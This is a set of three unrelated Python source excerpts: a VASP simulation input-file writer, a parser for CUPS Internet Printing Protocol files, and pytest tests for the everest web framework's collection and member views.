npoints = len(self.endpoints)
for n in xrange(npoints):
text+=' {0:18.14f} {1:18.14f} {2:18.14f}\n'.format(*self.endpoints[n])
if n!=npoints-1 and n%2==1:
text+='\n'
#end if
#end for
elif self.mode=='explicit':
text+='explicit kpoints\n {0}\n'.format(len(self.kpoints))
text+='{0}\n'.format(self.coord)
for n in xrange(len(self.kpoints)):
kp = self.kpoints[n]
kw = self.kweights[n]
text+=' {0:18.14f} {1:18.14f} {2:18.14f} {3:12.8f}\n'.format(kp[0],kp[1],kp[2],kw)
#end for
if 'tetrahedra' in self and len(self.tetrahedra)>0:
ntets = len(self.tetrahedra)
tets = self.tetrahedra
text+='tetrahedra\n'
text+=' {0} {1}'.format(ntets,tets[0].volume)
for n in xrange(ntets):
t = tets[n]
d = t.degeneracy
c = t.corners
text+=' {0:d} {1:d} {2:d} {3:d}\n'.format(d,*c)
#end for
#end if
else:
self.error('invalid mode: {0}\nvalid options are: auto, basis, line, explicit')
#end if
return text
#end def write_text
#end class Kpoints
class Penaltypot(VFormattedFile): # metadynamics -> 6.62.4 (2nd one)
None
#end class Penaltypot
class Poscar(VFormattedFile):
bool_map = {True:'T',False:'F'}
def __init__(self,filepath=None):
self.description = None
self.scale = None
self.axes = None
self.elem = None
self.elem_count = None
self.coord = None
self.pos = None
self.dynamic = None
self.vel_coord = None
self.vel = None
VFile.__init__(self,filepath)
#end def __init__
def read_text(self,text,filepath=''):
lines = self.read_lines(text,remove_empty=False)
nlines = len(lines)
min_lines = 8
if nlines<min_lines:
self.error('file {0} must have at least {1} lines\n only {2} lines found'.format(filepath,min_lines,nlines))
#end if
description = lines[0]
dim = 3
scale = float(lines[1].strip())
axes = empty((dim,dim))
axes[0] = array(lines[2].split(),dtype=float)
axes[1] = array(lines[3].split(),dtype=float)
axes[2] = array(lines[4].split(),dtype=float)
tokens = lines[5].split()
if tokens[0].isdigit():
counts = array(tokens,dtype=int)
elem = None
lcur = 6
else:
elem = array(tokens,dtype=str)
counts = array(lines[6].split(),dtype=int)
lcur = 7
#end if
if lcur<len(lines) and len(lines[lcur])>0:
c = lines[lcur].lower()[0]
lcur+=1
else:
self.error('file {0} is incomplete (missing positions)'.format(filepath))
#end if
selective_dynamics = c=='s'
if selective_dynamics: # Selective dynamics
if lcur<len(lines) and len(lines[lcur])>0:
c = lines[lcur].lower()[0]
lcur+=1
else:
self.error('file {0} is incomplete (missing positions)'.format(filepath))
#end if
#end if
cartesian = c=='c' or c=='k'
if cartesian:
coord = 'cartesian'
else:
coord = 'direct'
#end if
npos = counts.sum()
if lcur+npos>len(lines):
self.error('file {0} is incomplete (missing positions)'.format(filepath))
#end if
spos = []
for i in range(npos):
spos.append(lines[lcur+i].split())
#end for
lcur += npos
spos = array(spos)
pos = array(spos[:,0:3],dtype=float)
if selective_dynamics:
dynamic = array(spos[:,3:6],dtype=str)
dynamic = dynamic=='T'
else:
dynamic = None
#end if
if lcur<len(lines) and not self.is_empty(lines,lcur):
cline = lines[lcur].lower()
lcur+=1
if lcur+npos>len(lines):
self.error('file {0} is incomplete (missing velocities)'.format(filepath))
#end if
cartesian = len(cline)>0 and (cline[0]=='c' or cline[0]=='k')
if cartesian:
vel_coord = 'cartesian'
else:
vel_coord = 'direct'
#end if
svel = []
for i in range(npos):
svel.append(lines[lcur+i].split())
#end for
lcur += npos
vel = array(svel,dtype=float)
else:
vel_coord = None
vel = None
#end if
self.set(
description = description,
scale = scale,
axes = axes,
elem = elem,
elem_count = counts,
coord = coord,
pos = pos,
dynamic = dynamic,
vel_coord = vel_coord,
vel = vel
)
#end def read_text
def write_text(self,filepath=''):
msg = self.check_complete(exit=False)
if msg!='':
self.error('incomplete data to write file {0}\n{1}'.format(filepath,msg))
#end if
text = ''
if self.description is None:
text += 'System cell and coordinates\n'
else:
text += self.description+'\n'
#end if
text += ' {0}\n'.format(self.scale)
for a in self.axes:
text += ' {0:18.14f} {1:18.14f} {2:18.14f}\n'.format(*a)
#end for
if self.elem!=None:
for e in self.elem:
text += e+' '
#end for
text += '\n'
#end if
for ec in self.elem_count:
text += ' {0}'.format(ec)
#end for
text += '\n'
text += self.coord+'\n'
if self.dynamic is None:
for p in self.pos:
text += ' {0:18.14f} {1:18.14f} {2:18.14f}\n'.format(*p)
#end for
else:
bm = self.bool_map
for i in xrange(len(self.pos)):
p = self.pos[i]
d = self.dynamic[i]
text += ' {0:18.14f} {1:18.14f} {2:18.14f} {3} {4} {5}\n'.format(p[0],p[1],p[2],bm[d[0]],bm[d[1]],bm[d[2]])
#end for
#end if
if self.vel!=None:
text += self.vel_coord+'\n'
for v in self.vel:
text += ' {0:18.14f} {1:18.14f} {2:18.14f}\n'.format(*v)
#end for
#end if
return text
#end def write_text
def check_complete(self,exit=True):
msg = ''
if self.scale is None:
msg += 'scale is missing\n'
#end if
if self.axes is None:
msg += 'axes is missing\n'
#end if
if self.elem_count is None:
msg += 'elem_count is missing\n'
#end if
if self.coord is None:
msg += 'coord is missing\n'
#end if
if self.pos is None:
msg += 'pos is missing\n'
#end if
if self.vel!=None and self.vel_coord is None:
msg += 'vel_coord is missing\n'
#end if
if exit:
self.error(msg)
#end if
return msg
#end def check_complete
#end class Poscar
class Potcar(VFormattedFile):
def __init__(self,filepath=None,files=None):
self.files = files
self.filepath = filepath
self.pseudos = obj()
if not os.path.isdir(filepath):
VFile.__init__(self,filepath)
else:
VFile.__init__(self)
#end if
#end def __init__
def read_text(self,text,filepath=''):
start = 0
end = len(text)
pstart = start
pend = end
n = 0
iter = 0
while n<end and iter<20:
n = text.find('End of Dataset',start,end)
if n==-1:
break
#end if
start = n
n=text.find('\n',start,end)+1
pend = n
self.pseudos.append(text[pstart:pend])
pstart = pend
start = pend
iter+=1
#end while
if iter>=20:
self.error('failed to read file {0}'.format(filepath))
#end if
#end def read_text
def write_text(self,filepath=''):
text = ''
if len(self.pseudos)>0:
for i in range(len(self.pseudos)):
text += self.pseudos[i]
#end for
elif self.filepath!=None and self.files!=None:
for file in self.files:
text += open(os.path.join(self.filepath,file),'r').read()
#end for
#end if
return text
#end def write_text
def pot_info(self):
pot_info = obj()
if len(self.pseudos)>0:
pots = self.pseudos
elif self.filepath!=None and self.files!=None:
pots = obj()
for file in self.files:
pots.append(open(os.path.join(self.filepath,file),'r').read())
#end for
else:
pots = obj()
#end if
for i in range(len(pots)):
pot = pots[i]
n1 = pot.find('\n')
n2 = pot.find('\n',n1+1)
Zval = int(float(pot[n1:n2].strip()))
n = pot.find('VRHFIN')
n1 = pot.find('=',n+1)+1
n2 = pot.find(':',n1+1)
element = pot[n1:n2].strip()
pot_info.append(obj(Zval=Zval,element=element))
#end for
return pot_info
#end def pot_info
def load(self):
self.pseudos.clear()
if self.filepath!=None and self.files!=None:
for file in self.files:
self.pseudos.append(open(os.path.join(self.filepath,file),'r').read())
#end for
#end if
#end def load
#end class Potcar
class Exhcar(VFormattedFile):
None
#end class Exhcar
class VaspInput(SimulationInput):
all_inputs = '''
EXHCAR ICONST INCAR KPOINTS PENALTYPOT POSCAR POTCAR
STOPCAR WAVEDER
'''.split()
all_outputs = '''
CHG CHGCAR CONTCAR DOSCAR ELFCAR EIGENVAL HILLSPOT
IBZKPT LOCPOT OSZICAR OUTCAR PCDAT PRJCAR
PROCAR PROOUT REPORT TMPCAR WAVECAR XDATCAR vasprun.xml
'''.split()# note that CHGCAR, TMPCAR, and WAVECAR sometimes contain input
input_files = obj(
#exhcar = Exhcar,
#iconst = Iconst,
incar = Incar,
kpoints = Kpoints,
#penaltypot = Penaltypot,
poscar = Poscar,
potcar = Potcar,
#stopcar = Stopcar,
#waveder = Waveder
)
keyword_files = obj(
incar = Incar,
stopcar = Stopcar
)
vasp_save_files = all_inputs + all_outputs
def __init__(self,filepath=None,prefix='',postfix=''):
if filepath!=None:
self.read(filepath,prefix,postfix)
#end if
#end def __init__
def read(self,filepath,prefix='',postfix=''):
path,tmp = os.path.split(filepath)
if len(path)>0 and not os.path.exists(path):
self.error('path {0} does not exist'.format(path))
#end if
for file in os.listdir(path):
name = file.lower()
if name in self.input_files:
filepath = os.path.join(path,prefix+file+postfix)
self[name] = self.input_files(filepath)
#end if
#end for
#end def read
def write(self,filepath,prefix='',postfix=''):
path,tmp = os.path.split(filepath)
if len(path)>0 and not os.path.exists(path):
self.error('path {0} does not exist'.format(path))
#end if
for name,vfile in self.iteritems():
filepath = os.path.join(path,prefix+name.upper()+postfix)
vfile.write(filepath)
#end for
#end def write
def incorporate_system(self,system,incorp_kpoints=True):
structure = system.structure
# assign kpoints
if len(structure.kpoints)>0 and incorp_kpoints:
kpoints = Kpoints()
kpoints.mode = 'explicit'
kpoints.coord = 'cartesian'
kpoints.kpoints = structure.kpoints.copy()
kpoints.kweights = structure.kweights.copy()
self.kpoints = kpoints
#end if
# assign poscar
if len(structure.elem)>0:
s = structure.copy()
species,species_count = s.order_by_species()
poscar = Poscar()
poscar.scale = 1.0
poscar.axes = s.axes
poscar.elem = species
poscar.elem_count = species_count
poscar.coord = 'cartesian'
poscar.pos = structure.pos
if 'frozen' in structure:
poscar.dynamic = s.frozen==False
#end if
self.poscar = poscar
#end if
# handle charged and spin polarized systems
# jtk mark: todo
#end def incorporate_system
#end class VaspInput
def generate_vasp_input(**kwargs):
if 'input_type' in kwargs:
input_type = kwargs['input_type']
del kwargs['input_type']
else:
input_type = 'general'
#end if
if input_type=='general':
vi = generate_any_vasp_input(**kwargs)
else:
VaspInput.class_error('input_type {0} is unrecognized\nvalid options are: general'.format(input_type))
#end if
return vi
#end def generate_vasp_input
generate_any_defaults = obj(
kcenter = None,
kpoints = None,
kweights = None,
kbasis = None,
kgrid = None,
kshift = (0,0,0),
kcoord = 'cartesian',
system = None,
pseudos = None
)
def generate_any_vasp_input(**kwargs):
# remove keywords associated with kpoints, poscar, and any other formatted files
vf = obj()
for name,default in generate_any_defaults.iteritems():
if name in kwargs:
vf[name] = kwargs[name]
del kwargs[name]
else:
vf[name] = default
#end if
#end for
# create an empty input file
vi = VaspInput()
# assign values to incar and any other keyword files
keywords = set(kwargs.keys())
for name,keyword_file in VaspInput.keyword_files.iteritems():
keys = keywords & keyword_file.keywords
if len(keys)>0:
kw = obj()
kw.move_from(kwargs,keys)
vfile = keyword_file()
vfile.assign(**kw)
vi[name] = vfile
#end if
#end for
# check for leftover keywords
if len(kwargs)>0:
VaspInput.class_error('unrecognized keywords: {0}'.format(sorted(kwargs.keys())),'generate_vasp_input')
#end if
# set potcar
if vf.pseudos!=None:
vi.potcar = Potcar(VaspInput.pseudo_dir,vf.pseudos)
#end if
gen_kpoints = not 'kspacing' in vf
# incorporate system information
if vf.system!=None:
vi.incorporate_system(vf.system,gen_kpoints)
#end if
# add kpoints information (override anything provided by system)
if gen_kpoints and (vf.kpoints!=None or vf.kweights!=None or vf.kbasis!=None or vf.kgrid!=None or vf.kcenter!=None):
if 'kpoints' in vi:
kp = vi.kpoints
kp.clear()
else:
kp = Kpoints()
vi.kpoints = kp
#end if
if vf.kpoints!=None:
kp.mode = 'explicit'
kp.kpoints = vf.kpoints
kp.kweights = vf.kweights
kp.coord = vf.kcoord
elif vf.kgrid!=None:
kp.mode = 'auto'
kp.centering = vf.kcenter
if vf.kgrid!=None:
kp.kgrid = vf.kgrid
#end if
if vf.kshift!=None:
kp.kshift = vf.kshift
#end if
else:
VaspInput.class_error('could not set kpoints from user inputs','generate_vasp_input')
#end if
#end if
return vi
#end def generate_any_vasp_input
| |
# -*- coding: utf-8 -*-
"""CUPS Internet Printing Protocol (IPP) files."""
import os
from dfdatetime import rfc2579_date_time as dfdatetime_rfc2579_date_time
from dtformats import data_format
from dtformats import errors
class CupsIppFile(data_format.BinaryDataFile):
"""CUPS Internet Printing Protocol (IPP) file."""
# Using a class constant significantly speeds up the time required to load
# the dtFabric definition file.
_FABRIC = data_format.BinaryDataFile.ReadDefinitionFile('cups_ipp.yaml')
_DELIMITER_TAG_OPERATION_ATTRIBUTES = 0x01
_DELIMITER_TAG_JOB_ATTRIBUTES = 0x02
_DELIMITER_TAG_END_OF_ATTRIBUTES = 0x03
_DELIMITER_TAG_PRINTER_ATTRIBUTES = 0x04
_DELIMITER_TAG_UNSUPPORTED_ATTRIBUTES = 0x05
_DELIMITER_TAGS = frozenset([
_DELIMITER_TAG_OPERATION_ATTRIBUTES,
_DELIMITER_TAG_JOB_ATTRIBUTES,
_DELIMITER_TAG_PRINTER_ATTRIBUTES,
_DELIMITER_TAG_UNSUPPORTED_ATTRIBUTES])
_TAG_VALUE_INTEGER = 0x21
_TAG_VALUE_BOOLEAN = 0x22
_TAG_VALUE_ENUM = 0x23
_TAG_VALUE_DATE_TIME = 0x31
_TAG_VALUE_RESOLUTION = 0x32
_TAG_VALUE_TEXT_WITHOUT_LANGUAGE = 0x41
_TAG_VALUE_NAME_WITHOUT_LANGUAGE = 0x42
_TAG_VALUE_KEYWORD = 0x44
_TAG_VALUE_URI = 0x45
_TAG_VALUE_URI_SCHEME = 0x46
_TAG_VALUE_CHARSET = 0x47
_TAG_VALUE_NATURAL_LANGUAGE = 0x48
_TAG_VALUE_MEDIA_TYPE = 0x49
_ASCII_STRING_VALUES = frozenset([
_TAG_VALUE_KEYWORD,
_TAG_VALUE_URI,
_TAG_VALUE_URI_SCHEME,
_TAG_VALUE_CHARSET,
_TAG_VALUE_NATURAL_LANGUAGE,
_TAG_VALUE_MEDIA_TYPE])
_INTEGER_TAG_VALUES = frozenset([
_TAG_VALUE_INTEGER, _TAG_VALUE_ENUM])
_STRING_WITHOUT_LANGUAGE_VALUES = frozenset([
_TAG_VALUE_TEXT_WITHOUT_LANGUAGE,
_TAG_VALUE_NAME_WITHOUT_LANGUAGE])
_TAG_VALUE_STRINGS = {
0x01: 'operation-attributes-tag',
0x02: 'job-attributes-tag',
0x03: 'end-of-attributes-tag',
0x04: 'printer-attributes-tag',
0x05: 'unsupported-attributes-tag',
0x0f: 'chunking-end-of-attributes-tag',
0x13: 'no-value',
0x21: 'integer',
0x22: 'boolean',
0x23: 'enum',
0x30: 'octetString',
0x31: 'dateTime',
0x32: 'resolution',
0x33: 'rangeOfInteger',
0x35: 'textWithLanguage',
0x36: 'nameWithLanguage',
0x41: 'textWithoutLanguage',
0x42: 'nameWithoutLanguage',
0x44: 'keyword',
0x45: 'uri',
0x46: 'uriScheme',
0x47: 'charset',
0x48: 'naturalLanguage',
0x49: 'mimeMediaType',
}
_DEBUG_INFO_ATTRIBUTE = [
('tag_value', 'Tag value', '_FormatIntegerAsTagValue'),
('name_size', 'Name size', '_FormatIntegerAsDecimal'),
('name', 'Name', None),
('value_data_size', 'Value data size', '_FormatIntegerAsDecimal'),
('value_data', 'Value data', '_FormatDataInHexadecimal')]
_DEBUG_INFO_HEADER = [
('major_version', 'Major version', '_FormatIntegerAsDecimal'),
('minor_version', 'Minor version', '_FormatIntegerAsDecimal'),
('operation_identifier', 'Operation identifier',
'_FormatIntegerAsHexadecimal4'),
('request_identifier', 'Request identifier',
'_FormatIntegerAsHexadecimal8')]
def __init__(self, debug=False, output_writer=None):
"""Initializes a CUPS Internet Printing Protocol (IPP) file.
Args:
debug (Optional[bool]): True if debug information should be written.
output_writer (Optional[OutputWriter]): output writer.
"""
super(CupsIppFile, self).__init__(
debug=debug, output_writer=output_writer)
self._last_charset_attribute = 'ascii'
def _FormatIntegerAsTagValue(self, integer):
"""Formats an integer as a tag value.
Args:
integer (int): integer.
Returns:
str: integer formatted as a tag value.
"""
return '0x{0:02x} ({1:s})'.format(
integer, self._TAG_VALUE_STRINGS.get(integer, 'UNKNOWN'))
def _ReadAttribute(self, file_object):
"""Reads an attribute.
Args:
file_object (file): file-like object.
Raises:
ParseError: if the attribute cannot be read.
"""
file_offset = file_object.tell()
data_type_map = self._GetDataTypeMap('cups_ipp_attribute')
attribute, _ = self._ReadStructureFromFileObject(
file_object, file_offset, data_type_map, 'attribute')
if self._debug:
self._DebugPrintStructureObject(attribute, self._DEBUG_INFO_ATTRIBUTE)
value = None
if attribute.tag_value in self._INTEGER_TAG_VALUES:
# TODO: correct file offset to point to the start of value_data.
value = self._ReadIntegerValue(attribute.value_data, file_offset)
if self._debug:
value_string = '{0:d}'.format(value)
self._DebugPrintValue('Value', value_string)
elif attribute.tag_value == self._TAG_VALUE_BOOLEAN:
value = self._ReadBooleanValue(attribute.value_data)
if self._debug:
value_string = '{0!s}'.format(value)
self._DebugPrintValue('Value', value_string)
elif attribute.tag_value == self._TAG_VALUE_DATE_TIME:
# TODO: correct file offset to point to the start of value_data.
value = self._ReadDateTimeValue(attribute.value_data, file_offset)
if self._debug:
self._DebugPrintValue('Value', value.CopyToDateTimeString())
elif attribute.tag_value == self._TAG_VALUE_RESOLUTION:
# TODO: add support for resolution
pass
elif attribute.tag_value in self._STRING_WITHOUT_LANGUAGE_VALUES:
value = attribute.value_data.decode(self._last_charset_attribute)
if self._debug:
self._DebugPrintValue('Value', value)
elif attribute.tag_value in self._ASCII_STRING_VALUES:
value = attribute.value_data.decode('ascii')
if self._debug:
self._DebugPrintValue('Value', value)
if attribute.tag_value == self._TAG_VALUE_CHARSET:
self._last_charset_attribute = value
if self._debug:
self._DebugPrintText('\n')
def _ReadAttributesGroup(self, file_object):
"""Reads an attributes group.
Args:
file_object (file): file-like object.
Raises:
ParseError: if the attributes group cannot be read.
"""
data_type_map = self._GetDataTypeMap('int8')
tag_value = 0
while tag_value != self._DELIMITER_TAG_END_OF_ATTRIBUTES:
file_offset = file_object.tell()
tag_value, _ = self._ReadStructureFromFileObject(
file_object, file_offset, data_type_map, 'tag value')
if tag_value >= 0x10:
file_object.seek(file_offset, os.SEEK_SET)
self._ReadAttribute(file_object)
elif (tag_value != self._DELIMITER_TAG_END_OF_ATTRIBUTES and
tag_value not in self._DELIMITER_TAGS):
raise errors.ParseError((
'Unsupported attributes groups start tag value: '
'0x{0:02x}.').format(tag_value))
def _ReadBooleanValue(self, byte_stream):
"""Reads a boolean value.
Args:
byte_stream (bytes): byte stream.
Returns:
bool: boolean value.
Raises:
ParseError: when the boolean value cannot be read.
"""
if byte_stream == b'\x00':
return False
if byte_stream == b'\x01':
return True
raise errors.ParseError('Unsupported boolean value.')
def _ReadDateTimeValue(self, byte_stream, file_offset):
"""Reads a RFC2579 date-time value.
Args:
byte_stream (bytes): byte stream.
file_offset (int): offset of the attribute data relative to the start of
the file-like object.
Returns:
dfdatetime.RFC2579DateTime: RFC2579 date-time stored in the value.
Raises:
ParseError: when the datetime value cannot be read.
"""
data_type_map = self._GetDataTypeMap('cups_ipp_datetime_value')
try:
value = self._ReadStructureFromByteStream(
byte_stream, file_offset, data_type_map, 'date-time value')
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError(
'Unable to parse datetime value with error: {0!s}'.format(exception))
rfc2579_date_time_tuple = (
value.year, value.month, value.day,
value.hours, value.minutes, value.seconds, value.deciseconds,
value.direction_from_utc, value.hours_from_utc, value.minutes_from_utc)
return dfdatetime_rfc2579_date_time.RFC2579DateTime(
rfc2579_date_time_tuple=rfc2579_date_time_tuple)
def _ReadIntegerValue(self, byte_stream, file_offset):
"""Reads an integer value.
Args:
byte_stream (bytes): byte stream.
file_offset (int): offset of the attribute data relative to the start of
the file-like object.
Returns:
int: integer value.
Raises:
ParseError: when the integer value cannot be read.
"""
data_type_map = self._GetDataTypeMap('int32be')
try:
return self._ReadStructureFromByteStream(
byte_stream, file_offset, data_type_map, 'integer value')
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError(
'Unable to parse integer value with error: {0!s}'.format(exception))
def _ReadHeader(self, file_object):
"""Reads the header.
Args:
file_object (file): file-like object.
Raises:
ParseError: if the header cannot be read.
"""
data_type_map = self._GetDataTypeMap('cups_ipp_header')
file_offset = file_object.tell()
header, _ = self._ReadStructureFromFileObject(
file_object, file_offset, data_type_map, 'header')
if self._debug:
self._DebugPrintStructureObject(header, self._DEBUG_INFO_HEADER)
def ReadFileObject(self, file_object):
"""Reads a CUPS Internet Printing Protocol (IPP) file-like object.
Args:
file_object (file): file-like object.
Raises:
ParseError: if the file cannot be read.
"""
self._ReadHeader(file_object)
self._ReadAttributesGroup(file_object)
# TODO: read data.
| |
"""
This file is part of the everest project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Created on Nov 17, 2011.
"""
import os
from pkg_resources import resource_filename # pylint: disable=E0611
from pyramid.compat import bytes_
from pyramid.compat import native_
from pyramid.testing import DummyRequest
import pytest
import transaction
from everest.constants import RequestMethods
from everest.mime import CSV_MIME
from everest.mime import CsvMime
from everest.mime import XmlMime
from everest.querying.specifications import eq
from everest.renderers import RendererFactory
from everest.resources.interfaces import IService
from everest.resources.utils import get_collection_class
from everest.resources.utils import get_root_collection
from everest.resources.utils import get_service
from everest.tests.complete_app.entities import MyEntity
from everest.tests.complete_app.fixtures import create_entity_tree
from everest.tests.complete_app.interfaces import IMyEntity
from everest.tests.complete_app.interfaces import IMyEntityChild
from everest.tests.complete_app.interfaces import IMyEntityParent
from everest.tests.simple_app.entities import FooEntity
from everest.tests.simple_app.interfaces import IFoo
from everest.tests.simple_app.resources import FooCollection
from everest.tests.simple_app.resources import FooMember
from everest.tests.simple_app.views import ExceptionPostCollectionView
from everest.tests.simple_app.views import ExceptionPutMemberView
from everest.tests.simple_app.views import UserMessagePostCollectionView
from everest.tests.simple_app.views import UserMessagePutMemberView
from everest.traversal import SuffixResourceTraverser
from everest.utils import get_repository_manager
from everest.views.getcollection import GetCollectionView
from everest.views.static import public_view
from everest.views.utils import accept_csv_only
__docformat__ = 'reStructuredText en'
__all__ = ['TestClassicStyleConfiguredViews',
'TestExceptionView',
'TestGetCollectionView',
'TestMessagingView',
'TestNewStyleConfiguredViews',
'TestPredicatedView',
'TestStaticView',
'TestViewBasicsMemory',
'TestViewBasicsRdb',
'TestWarningViewMemory',
'TestWarningViewRdb',
'TestWarningWithExceptionView',
]
@pytest.yield_fixture
def view_app_creator(app_creator):
app_creator.config.add_resource_view(IMyEntity,
renderer='csv',
request_method=RequestMethods.GET)
app_creator.config.add_member_view(IMyEntity,
renderer='csv',
request_method=RequestMethods.PUT)
app_creator.config.add_member_view(IMyEntity,
renderer='csv',
request_method=RequestMethods.PATCH)
app_creator.config.add_collection_view(IMyEntity,
renderer='csv',
request_method=RequestMethods.POST)
app_creator.config.add_collection_view(IMyEntityChild,
renderer='csv',
request_method=RequestMethods.POST)
app_creator.config.add_member_view(IMyEntity,
renderer='csv',
request_method=RequestMethods.DELETE)
app_creator.config.add_member_view(IMyEntityParent,
renderer='csv',
request_method=RequestMethods.DELETE)
app_creator.config.add_member_view(IMyEntity,
renderer='csv',
name='number',
request_method=RequestMethods.DELETE)
yield app_creator
@pytest.yield_fixture
def msg_view_app_creator(app_creator):
app_creator.config.add_resource_view(IMyEntity,
renderer='csv',
request_method=RequestMethods.GET,
enable_messaging=True)
app_creator.config.add_member_view(IMyEntity,
renderer='csv',
request_method=RequestMethods.PATCH,
enable_messaging=False)
yield app_creator
@pytest.yield_fixture
def pred_view_app_creator(app_creator):
app_creator.config.add_renderer('csv', RendererFactory)
app_creator.config.add_view(context=get_collection_class(IMyEntity),
view=GetCollectionView,
renderer='csv',
request_method=RequestMethods.GET,
custom_predicates=(accept_csv_only,))
yield app_creator
@pytest.fixture
def view_collection(app_creator): #pylint:disable=W0613
my_entity1 = create_entity_tree(id=0, text='foo0')
my_entity2 = create_entity_tree(id=1, text='too1')
coll = get_root_collection(IMyEntity)
coll.create_member(my_entity1)
coll.create_member(my_entity2)
return coll
@pytest.fixture
def view_member(view_collection): #pylint: disable=W0621
view_collection.filter = eq(id=0)
return next(iter(view_collection))
@pytest.yield_fixture
def trv_app_creator(app_creator):
app_creator.config.add_traverser(SuffixResourceTraverser)
yield app_creator
@pytest.fixture
def trv_view_member(app_creator): #pylint:disable=W0613
foo_ent = FooEntity(id=0)
coll = get_root_collection(IFoo)
mb = coll.create_member(foo_ent)
transaction.commit()
return mb
@pytest.yield_fixture
def static_vw_app_creator(app_creator):
app_creator.config.load_zcml(
'everest.tests.complete_app:configure_no_rdb.zcml')
app_creator.config.add_view(context=IService,
view=public_view,
name='public',
request_method=RequestMethods.GET)
fn = resource_filename('everest.tests.complete_app', 'data/original')
app_creator.config.registry.settings['public_dir'] = fn
yield app_creator
@pytest.yield_fixture
def exc_vw_app_creator(app_creator):
app_creator.config.add_member_view(IMyEntity,
view=ExceptionPutMemberView,
request_method=RequestMethods.PUT)
app_creator.config.add_collection_view(IMyEntity,
view=ExceptionPostCollectionView,
request_method=RequestMethods.POST)
yield app_creator
@pytest.yield_fixture
def wrn_vw_app_creator(app_creator):
repo_mgr = get_repository_manager()
repo_mgr.initialize_all()
app_creator.config.add_collection_view(FooCollection,
view=UserMessagePostCollectionView,
request_method=RequestMethods.POST)
app_creator.config.add_member_view(FooMember,
view=UserMessagePutMemberView,
request_method=RequestMethods.PUT)
yield app_creator
@pytest.yield_fixture
def wrn_with_exc_vw_app_creator(app_creator):
app_creator.config.load_zcml(
'everest.tests.complete_app:configure_no_rdb.zcml')
app_creator.config.add_view(context=get_collection_class(IMyEntity),
view=ExceptionPostCollectionView,
request_method=RequestMethods.POST)
yield app_creator
# We make excessive use of local test fixtures here.
# pylint: disable=W0621
class _TestViewBase(object):
package_name = 'everest.tests.complete_app'
app_name = 'complete_app'
path = '/my-entities/'
def test_get_collection_defaults(self,
view_app_creator): # pylint:disable=W0621
res = view_app_creator.get(self.path, status=200)
assert not res is None
@pytest.mark.usefixtures('view_collection')
def test_get_collection_with_slice_larger_max_size(self,
view_app_creator): # pylint:disable=W0621
res = view_app_creator.get(self.path,
params=dict(size=10000), status=200)
assert not res is None
@pytest.mark.usefixtures('view_collection')
def test_get_collection_with_invalid_slice_raises_error(self,
view_app_creator): # pylint:disable=W0621
res = view_app_creator.get(self.path,
params=dict(size='foo'), status=500)
assert not res is None
@pytest.mark.usefixtures('view_collection')
def test_get_collection_with_slice_size(self,
view_app_creator): # pylint:disable=W0621
res = view_app_creator.get(self.path, params=dict(size=1),
status=200)
assert not res is None
@pytest.mark.usefixtures('view_collection')
def test_get_collection_with_slice_start(self,
view_app_creator): # pylint:disable=W0621
res = view_app_creator.get(self.path,
params=dict(start=1, size=1),
status=200)
assert not res is None
@pytest.mark.usefixtures('view_collection')
def test_get_collection_with_filter(self,
view_app_creator): # pylint:disable=W0621
res = view_app_creator.get(self.path,
params=dict(q='id:equal-to:0'),
status=200)
assert not res is None
@pytest.mark.usefixtures('view_collection')
def test_get_collection_with_order(self,
view_app_creator): # pylint:disable=W0621
res = view_app_creator.get(self.path, params=dict(sort='id:asc'),
status=200)
assert not res is None
@pytest.mark.usefixtures('view_collection')
def test_get_collection_with_order_and_size(self,
view_app_creator): # pylint:disable=W0621
res = view_app_creator.get(self.path,
params=dict(sort='id:asc', size=1),
status=200)
assert not res is None
@pytest.mark.usefixtures('view_collection')
def test_get_collection_with_refs_options(self,
view_app_creator): # pylint:disable=W0621
# The refs options are not processed by the renderers, so we need
# a native everest view with a defined response MIME type.
view_app_creator.config.add_resource_view(
IMyEntity,
default_response_content_type=CsvMime,
request_method=RequestMethods.GET)
res1 = view_app_creator.get(self.path, params=dict(refs='parent:OFF'),
status=200)
assert not res1 is None
assert native_(res1.body).find(',"parent",') == -1
assert native_(res1.body).find(',"parent.id",') == -1
res2 = view_app_creator.get(self.path,
params=dict(refs='parent:INLINE'),
status=200)
assert not res2 is None
assert native_(res2.body).find(',"parent",') == -1
assert native_(res2.body).find(',"parent.id",') != -1
# Bogus refs parameters.
view_app_creator.get(self.path, params=dict(refs='parent:XXX'),
status=500)
@pytest.mark.usefixtures('view_collection')
def test_get_member_default_content_type(self,
view_app_creator): # pylint:disable=W0621
res = view_app_creator.get("%s/0" % self.path, status=200)
assert not res is None
def test_put_member(self, view_app_creator, view_member): # pylint:disable=W0621
req_body = b'"id","text","number"\n0,"abc",2\n'
res = view_app_creator.put("%s/0" % self.path,
params=req_body,
content_type=CsvMime.mime_type_string,
status=200)
assert not res is None
assert view_member.text == 'abc'
assert view_member.number == 2
req_body = b'"id","text","number"\n2,"abc",2\n'
res = view_app_creator.put("%s/0" % self.path,
params=req_body,
content_type=CsvMime.mime_type_string,
status=200)
assert view_member.id == 2
assert res.headers['Location'].endswith('2/')
def test_patch_member(self, view_app_creator, view_member): # pylint:disable=W0621
req_body = b'"number"\n2\n'
res = view_app_creator.patch("%s/0" % self.path,
params=req_body,
content_type=CsvMime.mime_type_string,
status=200)
assert not res is None
assert view_member.number == 2
req_body = b'"id"\n2\n'
res = view_app_creator.patch("%s/0" % self.path,
params=req_body,
content_type=CsvMime.mime_type_string,
status=200)
assert view_member.id == 2
assert res.headers['Location'].endswith('2/')
def test_patch_member_with_xml(self,
view_app_creator, view_member): # pylint:disable=W0621
view_app_creator.config.add_member_view(IMyEntity,
renderer='xml',
request_method=RequestMethods.PATCH)
req_body = \
b'<tst:myentity xmlns:tst="http://xml.test.org/tests" id="0">' \
b' <tst:number>2</tst:number>' \
b'</tst:myentity>'
res = view_app_creator.patch("%s/0" % self.path,
params=req_body,
content_type=XmlMime.mime_type_string,
status=200)
assert not res is None
assert view_member.number == 2
@pytest.mark.usefixtures('view_collection')
def test_post_nested_collection_no_parent(self, class_ini,
view_app_creator, view_member): # pylint:disable=W0621
parent_url = "%s%s/0/" % (class_ini.app_url, self.path)
req_body = b'"id","text"\n2,"child2"\n'
res = view_app_creator.post("%schildren" % parent_url,
params=req_body,
content_type=CsvMime.mime_type_string,
status=201)
assert not res is None
child_coll = get_root_collection(IMyEntityChild)
child_mb = child_coll['2']
assert child_mb.text == 'child2'
assert child_mb.parent.id == view_member.id
def test_delete_member(self, view_app_creator, view_collection): # pylint:disable=W0621
